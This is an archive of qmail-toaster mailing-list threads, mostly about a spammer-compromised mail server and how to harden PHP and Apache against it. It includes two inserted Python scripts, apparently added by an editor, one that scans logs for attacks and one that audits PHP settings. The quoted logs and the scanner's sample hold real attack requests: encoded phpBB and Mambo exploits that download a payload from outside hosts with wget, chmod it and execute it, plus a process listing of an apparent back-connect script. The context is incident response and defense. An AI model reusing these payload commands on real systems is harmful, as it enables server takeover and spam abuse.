Re: [toaster] chkuser

tonix (Antonio Nati) wrote:

At 05.14 09/02/2006, you wrote:

Is there a way to close a connection after 3 or 4 invalid mailboxes are reached on a single connection? When spammers hit my production server I see multiple emails in the log account; these could be blocked after 3 or 4 invalid addresses are reached.

It's all already inside the box. Check carefully the toaster documentation or look in http://www.interazioni.it/opensource/chkuser/documentation/chkuser_settings.html#Tarpitting for more info on chkuser settings.

Ciao,
Tonino

Thanks,
Dennis

According to your documents all I should have to do is change out the CHKUSER_WRONGRCPTLIMIT to, let's say, 4 and then recompile?

#define CHKUSER_WRONGRCPT_LIMIT_VARIABLE CHKUSER_WRONGRCPTLIMIT

This is the definition of the variable; you have to recompile and install after this change. Then you must declare (in tcp.smtp or in the running script) the variable CHKUSER_WRONGRCPTLIMIT with the value you want (zero means infinite).

Ciao,
Tonino

Dennis

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Your virus free electronic mail on UfficioPostale.IT
[toaster] Toaster compromised? Or system?

*warning long email*

Hi all,

We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how, and how to prevent this...

My server is a Sempron 2800+ / 1GB RAM running Redhat 9 and toaster version .61 (not the latest I know, but I haven't been able to update it that often).

I say compromised because I came in in the morning and found 40-something thousand mails in the queue. We never see more than a few hundred. It had filled up the disk, and I noticed that they were all mails to hotmail/yahoo/etc addresses. Bad news.

So I started looking around. I started to suspect that this was some sort of apache / php exploit, and I noticed the following output of a ps -ef f:

[EMAIL PROTECTED] ps -ef f
UID        PID  PPID  C STIME TTY  STAT  TIME CMD
snip
root      3761     1  0 Jan19 ?    S     0:00 /bin/sh /command/svscanboot
root      3768  3761  0 Jan19 ?    S     0:49  \_ svscan /service
root      3770  3768  0 Jan19 ?    S     0:00  |   \_ supervise qmail-send
qmails    3792  3770  0 Jan19 ?    S     3:13  |   |   \_ qmail-send
root      3795  3792  0 Jan19 ?    S     0:05  |   |       \_ qmail-lspawn
qmailr    3796  3792  0 Jan19 ?    S     0:20  |   |       \_ qmail-rspawn
qmailr    5716  3796  0 13:16 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    5719  3796  0 13:16 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    5735  3796  0 13:16 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    5757  3796  0 13:16 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    5910  3796  0 13:17 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    5951  3796  0 13:17 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6149  3796  0 13:18 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6233  3796  0 13:18 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6299  3796  0 13:18 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6388  3796  0 13:19 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6430  3796  0 13:19 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6560  3796  0 13:19 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6715  3796  0 13:20 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6846  3796  0 13:20 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    6852  3796  0 13:20 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7133  3796  0 13:21 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7541  3796  0 13:23 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7563  3796  0 13:23 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7600  3796  0 13:23 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7614  3796  0 13:23 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    7625  3796  0 13:23 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    8169  3796  0 13:25 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    8319  3796  0 13:26 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    8446  3796  0 13:26 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    8569  3796  0 13:27 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    8681  3796  0 13:27 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr    9214  3796  0 13:27 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   10366  3796  0 13:28 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   10564  3796  0 13:29 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   10760  3796  0 13:29 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   10871  3796  0 13:29 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   11544  3796  0 13:30 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   11731  3796  0 13:31 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   12238  3796  0 13:31 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   12402  3796  0 13:31 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   13074  3796  0 13:32 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   13280  3796  0 13:32 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   14385  3796  0 13:34 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   14413  3796  0 13:34 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   14576  3796  0 13:34 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   15075  3796  0 13:35 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   15081  3796  0 13:35 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   15705  3796  0 13:35 ?    S     0:00  |   |       |   \_ qmail-rem
qmailr   15933  3796  0 13:35 ?
Re: [toaster] Toaster compromised? Or system?

David wrote:

*warning long email*

Hi all,

We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how, and how to prevent this...

apache   32499 32498  0 Feb08 ?    S     0:00  \_ perl /tmp/dc.txt 67.159.2
apache   32503 32499  0 Feb08 ?    S     0:00      \_ /bin/bash

Hi,

I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it.

You can then use a tool like qmail-remove to clean out the queue.

Regards,

Rick
Re: [toaster] Toaster compromised? Or system?

Rick Macdougall wrote:

David wrote:

*warning long email*

Hi all,

We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how, and how to prevent this...

apache   32499 32498  0 Feb08 ?    S     0:00  \_ perl /tmp/dc.txt 67.159.2
apache   32503 32499  0 Feb08 ?    S     0:00      \_ /bin/bash

Hi,

I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it.

You can then use a tool like qmail-remove to clean out the queue.

Regards,

Rick

Thanks Rick,

I'm running php 4.3.10 and I can't find any information about an xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking.

Thanks,

David.
Re: [toaster] Toaster compromised? Or system?

Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the culprit script.

Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700:

wget
ftp
lynx

If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on these files, they had to have executed the script with: perl filename.pl

Check out mod_security for Apache as well.

Peter

On 2/10/06, David [EMAIL PROTECTED] wrote:

Rick Macdougall wrote:

David wrote:

*warning long email*

Hi all,

We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how, and how to prevent this...

apache   32499 32498  0 Feb08 ?    S     0:00  \_ perl /tmp/dc.txt 67.159.2
apache   32503 32499  0 Feb08 ?    S     0:00      \_ /bin/bash

Hi,

I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it.

You can then use a tool like qmail-remove to clean out the queue.

Regards,

Rick

Thanks Rick,

I'm running php 4.3.10 and I can't find any information about an xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking.

Thanks,

David.
Re: [toaster] Toaster compromised? Or system?

David wrote:

Rick Macdougall wrote:

Hi,

I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc).

I'm running php 4.3.10 and I can't find any information about an xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking.

http://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulnerable_to_xmlrpc_exploits.html

Regards,

Rick
Re: [toaster] Toaster compromised? Or system?

Thanks Peter - reassuring to know that someone else thinks they probably didn't get root...

I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.

I uncovered this in the apache logs:

./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one.

Closer to date is:

./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1

But it looks like that one failed.

Oh well, time to update php and clean out a few old phpbb installs.

Thanks all for your help.

David

Peter Maag wrote:

Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the culprit script.

Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700:

wget
ftp
lynx

If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on these files, they had to have executed the script with: perl filename.pl

Check out mod_security for Apache as well.

Peter

On 2/10/06, *David* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:

Rick Macdougall wrote:

David wrote:

*warning long email*

Hi all,

We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how, and how to prevent this...

apache   32499 32498  0 Feb08 ?    S     0:00  \_ perl /tmp/dc.txt 67.159.2
apache   32503 32499  0 Feb08 ?    S     0:00      \_ /bin/bash

Hi,

I believe that is the xmlrpc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it.

You can then use a tool like qmail-remove to clean out the queue.

Regards,

Rick

Thanks Rick,

I'm running php 4.3.10 and I can't find any information about an xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking.

Thanks,

David.
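Peter's suggestion above (grep the Apache logs for wget or ftp) and the two entries David then found are the kind of thing a small scanner catches more reliably than a plain grep, because the payload is URL-encoded and in the phpBB hit part of it is encoded twice (%2527). The script below is an added example, not code from the thread or from the toaster: it URL-decodes each request until the text stops changing and then matches a handful of indicators. The sample lines are constructed here from David's two log entries, reassembled on one line each with the & separators the archive dropped restored as an assumption, plus one benign phpBB request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample: David's two log entries from the thread, reassembled
# with the '&' separators restored (an assumption), plus a benign request.
SAMPLE_LOG = r'''
86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1
10.0.0.5 - - [10/Feb/2006:09:00:00 +0930] "GET /store/phpbb2/viewtopic.php?t=2&highlight=toaster HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

METHOD_RE = re.compile(r'\b(?:GET|POST|HEAD)\s+(\S+)')
CLIENT_RE = re.compile(r'\[client ([0-9.]+)\]')            # error_log form
IP_RE = re.compile(r'^([0-9]{1,3}(?:\.[0-9]{1,3}){3})\s')   # access_log form

# Indicators are matched against the *decoded* request so that hex-encoded
# commands (the %65%63%68%6F "echo" in the phpBB hit) do not slip past.
INDICATORS = {
    "download tool":  re.compile(r'\b(?:wget|curl|ftp|lynx|fetch)\b'),
    "tmp staging":    re.compile(r'\bcd\s+/tmp\b|/tmp/'),
    "chmod/execute":  re.compile(r'\bchmod\b|;\s*\./|;\s*bin/'),
    "php exec func":  re.compile(r'\b(?:passthru|system|exec|shell_exec|popen)\s*\('),
    "remote include": re.compile(r'=\s*(?:https?|ftp)://'),
}


def fully_decode(s, rounds=3):
    """URL-decode until the text stops changing (bounded), so a double
    encoding such as %2527 -> %27 -> ' is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_line(line):
    """Return a finding for a suspicious access_log or error_log line, else None."""
    m = METHOD_RE.search(line)
    if not m:
        return None
    request = fully_decode(m.group(1))
    hits = [name for name, rx in INDICATORS.items() if rx.search(request)]
    if not hits:
        return None
    client = CLIENT_RE.search(line) or IP_RE.match(line)
    return {"client": client.group(1) if client else "?",
            "indicators": hits,
            "request": request}


def scan_log(text):
    """One finding per suspicious line; benign requests are dropped."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], "-", ", ".join(finding["indicators"]))
        print("    ", finding["request"][:110])
```

Run it over the real files with `scan_log(open(path).read())`; the decoded request is what you want to read, since it shows the staging directory and the download host in clear text, which is also what to block at the firewall and to look for in /tmp.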
Re: [toaster] Qmail can't send receive

Cahyo Purnomo wrote:

[EMAIL PROTECTED] root]# tail -f /var/log/qmail/current
@400043ec3c0f24382dbc status: local 0/10 remote 0/20
@400043ec3c0f2438358c end msg 117047
@400043ec3c6223f50e24 starting delivery 58: msg 117255 to remote [EMAIL PROTECTED]
@400043ec3c6223f5314c status: local 0/10 remote 1/20
@400043ec3c77015eb34c delivery 58: deferral: CNAME_lookup_failed_temporarily._(#4.4.3)/
@400043ec3c77015ed28c status: local 0/10 remote 0/20
@400043ec3dd300ca04cc starting delivery 59: msg 117045 to remote [EMAIL PROTECTED]
@400043ec3dd300ca27f4 status: local 0/10 remote 1/20
@400043ec3de92b1a1884 delivery 59: deferral: Sorry,_I_couldn't_find_any_host_by_that_name._(#4.1.2)/
@400043ec3de92b1a33dc status: local 0/10 remote 0/20

Looks like DNS is not working. That will stop mail for sure.

Regards,

Bill
Re: [toaster] Toaster compromised? Or system?

I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.

Peter

On 2/10/06, David [EMAIL PROTECTED] wrote:

Bill Shupp wrote:

David wrote:

Thanks Peter - reassuring to know that someone else thinks they probably didn't get root...

I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.

I uncovered this in the apache logs:

./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one.

Closer to date is:

./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1

But it looks like that one failed.

Oh well, time to update php and clean out a few old phpbb installs.

Thanks all for your help.

David

A few things I always run into with PHP that are popular:

1) Make sure PHPBB is the latest version and not exploitable. I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version. I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore. I just run security updates daily instead on all packages. Haven't been exploited since.

2) Keep register_globals off, and only turn it on as needed.

3) Make sure allow_url_fopen is set to OFF. This is a very popular one, and in my experience tends to attract DDoS attacks rather than a mail exploit. But it costs you expensive bandwidth nonetheless.

Regards,

Bill

Cheers Bill,

register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-site setting.

David
Re: [toaster] Toaster compromised? Or system?

And for increased security I would recommend that you set these php variables in your apache virtual host entry:

php_admin_value open_basedir /path/to/domain/dir/htdocs:/path/to/other/include/dirs
php_admin_value upload_tmp_dir /path/to/domain/dir/htdocs/phpuploadtmpdir

This will only allow php to open files in those directories. If you will allow uploading files, then you should change the upload temp path to be inside one of the open_basedir directories.

--
Jose Canciani.

On 2/10/06, Peter Maag [EMAIL PROTECTED] wrote:

I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.

Peter

On 2/10/06, David [EMAIL PROTECTED] wrote:

Bill Shupp wrote:

David wrote:

Thanks Peter - reassuring to know that someone else thinks they probably didn't get root...

I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.

I uncovered this in the apache logs:

./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one.

Closer to date is:

./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1

But it looks like that one failed.

Oh well, time to update php and clean out a few old phpbb installs.

Thanks all for your help.

David

A few things I always run into with PHP that are popular:

1) Make sure PHPBB is the latest version and not exploitable. I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version. I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore. I just run security updates daily instead on all packages. Haven't been exploited since.

2) Keep register_globals off, and only turn it on as needed.

3) Make sure allow_url_fopen is set to OFF. This is a very popular one, and in my experience tends to attract DDoS attacks rather than a mail exploit. But it costs you expensive bandwidth nonetheless.

Regards,

Bill

Cheers Bill,

register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-site setting.

David
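Bill's register_globals and allow_url_fopen points and Jose's open_basedir/upload_tmp_dir advice are all settings, so the practical check is an audit that reads a vhost or php.ini and reports the weak values before an attacker does. The script below is an added example, not code from the thread or the toaster. The two vhost fragments are constructed (the /var/www/example paths are placeholders), and path_allowed mirrors the documented open_basedir rule that an entry is matched as a string prefix, so an entry without a trailing slash also admits sibling directories that share the prefix; that is the caveat the thread's /path/to/domain/dir/htdocs form does not mention.

```python
import posixpath

# Constructed Apache vhost fragments; paths under /var/www/example are placeholders.
WEAK_VHOST = """
<VirtualHost *:80>
    ServerName www.example.test
    php_admin_flag register_globals On
    php_admin_flag allow_url_fopen On
</VirtualHost>
"""

HARDENED_VHOST = """
<VirtualHost *:80>
    ServerName www.example.test
    php_admin_flag  register_globals Off
    php_admin_flag  allow_url_fopen  Off
    php_admin_value open_basedir   /var/www/example/htdocs/:/var/www/example/include/
    php_admin_value upload_tmp_dir /var/www/example/htdocs/phpuploadtmpdir
</VirtualHost>
"""

PHP_DIRECTIVES = ("php_admin_value", "php_admin_flag", "php_value", "php_flag")
OFF_VALUES = {"off", "0", "", "false", "no", "none"}


def parse_php_settings(text):
    """Collect PHP settings from php.ini 'key = value' lines and from Apache
    php_admin_value/php_admin_flag lines; later lines override earlier ones."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()       # php.ini comments start with ';'
        if not line or line.startswith("#"):
            continue
        if line.startswith(PHP_DIRECTIVES):
            parts = line.split(None, 2)
            if len(parts) == 3:
                settings[parts[1]] = parts[2].strip().strip('"')
        elif "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip().strip('"')
    return settings


def is_off(value):
    return value.strip().lower() in OFF_VALUES


def path_allowed(path, open_basedir):
    """Mirror PHP's documented open_basedir matching: each entry is a string
    prefix of the normalised path, so '/var/www/a' also admits '/var/www/abc';
    an entry ending in '/' restricts access to that directory tree."""
    norm = posixpath.normpath(path)               # collapses ../ segments
    for entry in open_basedir.split(":"):
        entry = entry.strip()
        if not entry:
            continue
        if entry == "/":
            return True
        if entry.endswith("/"):
            if norm == entry.rstrip("/") or norm.startswith(entry):
                return True
        elif norm.startswith(entry):
            return True
    return False


def audit_php_settings(settings):
    """Findings for the weak values the thread warns about."""
    findings = []
    # register_globals has defaulted to Off since PHP 4.2; On makes every
    # request parameter a PHP variable.
    if not is_off(settings.get("register_globals", "Off")):
        findings.append("register_globals is On")
    # allow_url_fopen defaults to On. The mambo request in the thread sets
    # mosConfig_absolute_path to an http:// URL; on the PHP 4 of that era the
    # remote include only works while this is On (PHP 5.2 later split out
    # allow_url_include).
    if not is_off(settings.get("allow_url_fopen", "On")):
        findings.append("allow_url_fopen is On")
    basedir = settings.get("open_basedir", "")
    if not basedir:
        findings.append("open_basedir unset: PHP may read any file the apache user can")
        return findings
    for entry in basedir.split(":"):
        if entry and not entry.endswith("/"):
            findings.append("open_basedir entry %r lacks a trailing slash and matches as a prefix" % entry)
    tmp = settings.get("upload_tmp_dir", "/tmp")  # unset means the system temp dir
    if not path_allowed(tmp, basedir):
        findings.append("upload_tmp_dir %r is outside open_basedir" % tmp)
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_VHOST), ("hardened", HARDENED_VHOST)):
        print(name, audit_php_settings(parse_php_settings(cfg)) or ["no findings"])
```

Point it at each vhost block (or at `php -i` output saved to a file) rather than only php.ini, since php_admin_value in a vhost overrides the global file and a stray php_admin_flag register_globals On in one customer's block is exactly the thing this audit is meant to surface.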